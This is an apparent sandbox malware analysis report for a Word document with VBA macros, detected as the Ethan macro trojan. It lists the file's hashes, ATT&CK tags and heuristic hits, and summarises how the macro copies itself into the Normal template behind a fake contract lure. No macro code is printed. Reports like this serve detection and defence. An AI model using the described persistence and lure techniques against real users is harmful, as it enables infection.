Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 0d25baace796c230…

MALICIOUS

Office (OLE)

66.0 KB Created: 2010-05-11 11:54:00 Authoring application: Microsoft Word 8.0
MD5: c3bcd4c12894757b41f5e721bb6fb079 SHA-1: 2324177dd53d32269f3d43d813bb6efee6cffb07 SHA-256: 0d25baace796c230503b547343b46cfa8a93bbad1fcc4cb7108d04dcdda31916
140 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a Microsoft Word document containing VBA macros, identified as malicious by ClamAV. The embedded VBA script attempts to write its own code to 'c:\ethan.___' and modify the Normal template, likely to establish persistence or facilitate further execution. The document body presents a fake municipal contract to lure the user into enabling macros.

Heuristics 3

  • ClamAV: Doc.Trojan.Ethan-20 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Ethan-20
  • ClamAV detection on extracted artifact critical EXTRACTED_FILE_CLAMAV
    ClamAV flagged at least one file extracted from inside this sample. Even when the wrapping document carries no AV detection of its own, a hit on the carved artifact is a strong indicator the sample is a delivery vehicle.
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas
a2d70ac94361ce41829f2815f92d717b53b64d145708e724bf50b34acaa5361a		 vba-macro oletools.olevba.extract_macros (decoded VBA source) 6170 bytes
Detection
ClamAV: Doc.Trojan.Ethan-1
Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.